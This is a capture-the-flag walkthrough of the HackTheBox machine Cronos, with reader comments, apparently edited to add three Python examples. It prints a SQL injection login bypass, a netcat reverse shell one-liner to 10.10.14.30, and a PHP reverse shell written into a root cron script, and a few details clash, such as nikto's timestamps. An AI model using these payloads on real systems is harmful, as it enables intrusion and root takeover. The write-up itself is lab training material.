Let’s get started!

Level: medium

Reconnaissance

The first step is to scan the machine for open services (the -O OS-detection option needs root):

COMMAND: nmap -sC -sV -O -oA cronos 10.10.10.13

The nmap scan shows three open ports, among them HTTP (80) and DNS (53), both of which we use below.

Let’s open the webpage.

URL:http://10.10.10.13

We get the default Apache2 page.

Since we only get the default page when browsing by IP address, the web server is probably using name-based virtual hosts and serving the real site only for a hostname. If we add the machine's name cronos.htb to /etc/hosts and revisit, we get a different page:

COMMAND: echo "10.10.10.13 cronos.htb" >> /etc/hosts

Note the >>: a single > would overwrite /etc/hosts and throw away the localhost entries.

Let’s revisit the page again!

URL: http://cronos.htb

The site is built on the Laravel framework. Let's enumerate further with gobuster and nikto.

root@exp1o1t9r:~# gobuster dir -u http://cronos.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
 Gobuster v3.0.1
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
 [+] Url:            http://cronos.htb
 [+] Threads:        10
 [+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
 [+] Status codes:   200,204,301,302,307,401,403
 [+] User Agent:     gobuster/3.0.1
 [+] Timeout:        10s
2020-1-23 13:14:41 Starting gobuster
 /js (Status: 301)
 /css (Status: 301)
 /server-status (Status: 403)
root@exp1o1t9r:~/htb/machines/cronos-10.10.10.13# nikto -h cronos.htb
 - Nikto v2.1.6
 Target IP:          10.10.10.13
 Target Hostname:    cronos.htb
 Target Port:        80 
 + Start Time:         2020-1-23 13:15:02 (GMT-5)
 Server: Apache/2.4.18 (Ubuntu)
 The anti-clickjacking X-Frame-Options header is not present.
 The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
 The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
 Cookie XSRF-TOKEN created without the httponly flag
 No CGI Directories found (use '-C all' to force check all possible dirs)
 Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
 Allowed HTTP Methods: GET, HEAD 
 OSVDB-3092: /web.config: ASP config file is accessible.
 OSVDB-3268: /css/: Directory indexing found.
 OSVDB-3092: /css/: This might be interesting…
 OSVDB-3233: /icons/README: Apache default file found.
 7785 requests: 0 error(s) and 10 item(s) reported on remote host 
 + End Time:           2019-12-25 13:20:45 (GMT-5) (343 seconds)
 1 host(s) tested 

Nothing here jumps out, so let's step back to the service we haven't enumerated yet: DNS. If the name server allows zone transfers (AXFR) for cronos.htb, it will hand us every record in the zone, including hostnames we could not have guessed:

COMMAND: host -l cronos.htb 10.10.10.13

The transfer lists the zone's records; add each hostname to /etc/hosts. Append with >>, because > would overwrite the file (including the cronos.htb entry we just added):

COMMAND:

echo "10.10.10.13 admin.cronos.htb" >> /etc/hosts
echo "10.10.10.13 ns1.cronos.htb" >> /etc/hosts
echo "10.10.10.13 www.cronos.htb" >> /etc/hosts
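Turning a zone transfer into hosts entries is easy to script, and scripting it avoids the > versus >> mistake. The following is an added example, not code from the original write-up: it parses the "has address" lines of host -l output, compares them against the current /etc/hosts content, and returns only the lines that still need appending. The sample AXFR output and hosts content are constructed for the example (the hostnames match the ones found above), and the script name axfr_hosts.py in the usage comment is an assumption.

```python
import re
import sys

# Constructed sample of `host -l cronos.htb 10.10.10.13` output (not copied from the page).
SAMPLE_AXFR = """\
Using domain server:
Name: 10.10.10.13
Address: 10.10.10.13#53
Aliases:

cronos.htb name server ns1.cronos.htb.
cronos.htb has address 10.10.10.13
admin.cronos.htb has address 10.10.10.13
ns1.cronos.htb has address 10.10.10.13
www.cronos.htb has address 10.10.10.13
"""

# Constructed /etc/hosts content; cronos.htb was already added by hand.
SAMPLE_HOSTS = """\
127.0.0.1 localhost
10.10.10.13 cronos.htb
"""

# `host -l` prints A records as "<name> has address <ipv4>"; NS/MX lines are ignored.
A_RECORD = re.compile(r"^(\S+) has address (\d{1,3}(?:\.\d{1,3}){3})$")


def parse_host_l(text):
    """Return {hostname: ip} for every A record in `host -l` output."""
    records = {}
    for line in text.splitlines():
        m = A_RECORD.match(line.strip())
        if m:
            records[m.group(1).rstrip(".")] = m.group(2)
    return records


def hosts_names(existing):
    """Every name that the given /etc/hosts content already maps."""
    names = set()
    for line in existing.splitlines():
        fields = line.split("#", 1)[0].split()   # drop comments, split on whitespace
        if len(fields) >= 2:
            names.update(fields[1:])              # ip, then one or more names
    return names


def new_hosts_lines(existing, records):
    """Lines that must be appended so every discovered name resolves."""
    known = hosts_names(existing)
    return [f"{ip} {name}" for name, ip in sorted(records.items()) if name not in known]


def merge_hosts(existing, records):
    """Existing content plus the missing entries; never truncates what is there."""
    lines = new_hosts_lines(existing, records)
    if not lines:
        return existing
    body = existing if existing.endswith("\n") or not existing else existing + "\n"
    return body + "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Usage: host -l cronos.htb 10.10.10.13 | python3 axfr_hosts.py | sudo tee -a /etc/hosts
    with open("/etc/hosts") as fh:
        current = fh.read()
    for line in new_hosts_lines(current, parse_host_l(sys.stdin.read())):
        print(line)
```

Piping the script's output through tee -a keeps the append explicit; the script itself never writes to /etc/hosts.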

admin.cronos.htb looks very promising…

After adding admin.cronos.htb to /etc/hosts, let’s navigate to it:

A login page. Let's try a classic SQL injection authentication bypass:

admin' or '1'='1

The login succeeds: the single quote closes the string literal in the query's WHERE clause and the or '1'='1 clause makes the condition true regardless of the password. Once logged in, we test the admin page's input for OS command injection.
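To see why admin' or '1'='1 gets past the login, here is an added example, not the box's code (the admin panel's real query is not shown on the page). It builds the same login check the vulnerable way and the parameterised way against a constructed SQLite user table; the table contents and column names are assumptions.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the admin panel's user table (real schema unknown)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext password for brevity only; a real application stores a salted hash.
    con.execute("INSERT INTO users VALUES ('admin', 'Sup3rS3cret!')")
    return con


def login_vulnerable(con, username, password):
    """Builds the statement by string formatting, so input is parsed as SQL.

    With username = admin' or '1'='1 the WHERE clause becomes
        username='admin' or '1'='1' AND password='...'
    and because AND binds tighter than OR this reads as
        username='admin' OR ('1'='1' AND password='...')
    which is true for the admin row whatever the password is.
    """
    query = ("SELECT username FROM users "
             f"WHERE username='{username}' AND password='{password}'")
    return con.execute(query).fetchone()


def login_safe(con, username, password):
    """Parameterised statement: the driver binds input as data, never as SQL."""
    query = "SELECT username FROM users WHERE username=? AND password=?"
    return con.execute(query, (username, password)).fetchone()


def demo():
    """Run the bypass from the write-up against both versions."""
    con = make_db()
    payload = "admin' or '1'='1"
    return {
        # Same payload as the write-up, in the username field: bypass succeeds.
        "vuln_username": login_vulnerable(con, payload, "wrong"),
        # In the password field the trailing OR matches every row, so no valid
        # username is even needed.
        "vuln_password": login_vulnerable(con, "nobody", "x' or '1'='1"),
        # The parameterised query looks for a user literally named admin' or '1'='1.
        "safe_username": login_safe(con, payload, "wrong"),
        # ...and still works for genuine credentials.
        "safe_real": login_safe(con, "admin", "Sup3rS3cret!"),
    }
```

The fix is the placeholder in login_safe, not escaping quotes by hand: the database receives the statement and the values separately, so no input can change the statement's structure.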

Command injection works. With a listener running on the attacking machine (nc -nlvp 1234 on 10.10.14.30), we inject a netcat reverse shell one-liner: the named pipe /tmp/f feeds what nc receives into an interactive sh, and sh's output goes back through nc to our listener:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.30 1234 >/tmp/f

BOOM! We have a shell.

Privilege Escalation

Let's take a look at the crontab first, since the machine's name is CRONOS:
COMMAND: cat /etc/crontab

The crontab shows a job that runs /var/www/laravel/artisan as root. That file is writable by the user we have, so whatever we put into it executes as root the next time the job fires.
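The crontab check above can be made systematic: parse the system crontab, keep the jobs that run as root, and flag any absolute path in their commands that the current user can write to. This is an added example, not from the original write-up. The sample crontab is constructed (the schedule:run argument and the other jobs are assumptions), and demo() creates a temporary file to stand in for the writable artisan script so the block runs on any machine.

```python
import os
import re
import tempfile

# Constructed /etc/crontab in the usual Ubuntu layout; the artisan line mirrors what the
# write-up describes, but its schedule:run argument and the other jobs are assumptions.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
@reboot         www-data /usr/local/bin/warmcache.sh
"""

# Absolute paths inside a command string (stops at whitespace and shell punctuation).
PATH_TOKEN = re.compile(r"(?<![\w/])/[\w./-]+")


def parse_system_crontab(text):
    """Return [(user, command)] for the job lines of a system crontab.

    System crontabs (/etc/crontab, /etc/cron.d/*) have a user field between
    the schedule and the command; @reboot-style specials replace the five time
    fields with one. Blank lines, comments and VAR=value lines are skipped.
    """
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+\s*=", line):
            continue
        if line.startswith("@"):
            parts, needed = line.split(None, 2), 3       # @special user command
        else:
            parts, needed = line.split(None, 6), 7       # m h dom mon dow user command
        if len(parts) == needed:
            jobs.append((parts[-2], parts[-1]))
    return jobs


def writable_targets(command):
    """Existing paths named in `command` that the current user may write to."""
    hits = []
    for path in PATH_TOKEN.findall(command):
        if path == "/dev/null" or not os.path.exists(path):
            continue
        if os.access(path, os.W_OK):
            hits.append(path)
    return hits


def hijackable_root_jobs(text):
    """[(command, [writable paths])] for root jobs that execute something we can edit."""
    found = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        writable = writable_targets(command)
        if writable:
            found.append((command, writable))
    return found


def demo():
    """Stand-alone run: a temp file plays the role of the writable artisan script."""
    with tempfile.NamedTemporaryFile(prefix="artisan-", delete=False) as tmp:
        target = tmp.name
    try:
        crontab = SAMPLE_CRONTAB + f"* * * * *       root    php {target} schedule:run\n"
        return hijackable_root_jobs(crontab), target
    finally:
        os.unlink(target)


if __name__ == "__main__":
    with open("/etc/crontab") as fh:
        for command, paths in hijackable_root_jobs(fh.read()):
            print(f"root job: {command}\n  writable: {', '.join(paths)}")
```

On the target you would run it against /etc/crontab and the files in /etc/cron.d; a hit means the same privilege escalation as the artisan job here. Note that a writable parent directory is just as dangerous (the file can be replaced), which this check does not cover.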

Let's use artisan to get a root shell.

Overwrite artisan with a PHP reverse shell (the cron job runs the file with php, so PHP code goes straight in) and start a netcat listener on the attacking machine. This destroys the original artisan script, so copy it aside first if you want to restore it afterwards.

echo '<?php $sock=fsockopen("10.10.14.30",9999);exec("/bin/sh -i <&3 >&3 2>&3"); ?>' > /var/www/laravel/artisan

The socket is file descriptor 3 because it is the first descriptor PHP opens after stdin, stdout and stderr, so the redirections <&3 >&3 2>&3 attach all three of sh's standard streams to it.

nc -nlvp 9999

When the cron job next fires, the listener receives a root shell and we can read the root flag.

If you like my writeup , Give me Respect on my HTB profile : Exp1o1t9r

3 COMMENTS

  1. Hey mate,

    Thanks for this awesome write up.

    “echo “10.10.10.13 admin.cronos.htb” > /etc/hosts”
    In the above command I would use “>>” to append to the hosts file, I believe “>” just overwrites the hosts file.

    MY personal takeaway from this box:
    I experienced an awkward circumstance on this box, in which none of the reverse shells were working. I tried about 4 different shell codes and all were unsuccessful. This is when Burp Suite takes forever waiting for a response from the server and literally helps nothing. First, I thought that there was a problem with server bandwidth or this particular box might be quite busy at this time. Then I decided to use tcpdump to capture transactions between the server and my machine on tun0, where I could watch ping echo/req and other TCP segments and IP packets. Since tcpdump output is not as pleasant as Wireshark, I replayed the network test using Wireshark, and at that time I noticed that after the handshake there were 5 TCP re-transmissions occurring from the server to my machine, which means all got dropped at my end. This is normally caused by issues at layers 1 and 2 of the OSI model as a result of network/TCP congestion. However, this time all packets were being dropped by UFW on my machine. This can be addressed by adding a rule to accept the reverse shell from that specific IP/port into ufw's INPUT chain, or temporarily deactivating UFW (not recommended, unless you know what you are doing).

    ufw add rule, simplest solution:
    $ sudo ufw allow 4434/tcp

    * where 4434 is the port specified in nc:
    $ nc -lvnp 4434

    • Thanks for your comment!
      I didn't add any rule because I simply use netcat, as it does everything for us with a single command.
      Your approach is different and everyone has their own approach.
      Just keep trying to build new ways of pwning the machine as you are doing now :)

  2. You are right. What comes to my mind is that UFW/iptables are disabled by default on most distros, meaning there is no firewall activated by default after setting up the Linux OS, e.g. Kali Linux, Ubuntu, despite the UFW is . That might be the reason you did not need to add any rule to the firewall.

    The reason behind it is that Linux distros are not shipped with any open ports by default, so there is no need to have the firewall enabled as there is no open port to protect.

    https://askubuntu.com/questions/22667/why-is-the-firewall-disabled-by-default

    Cheers
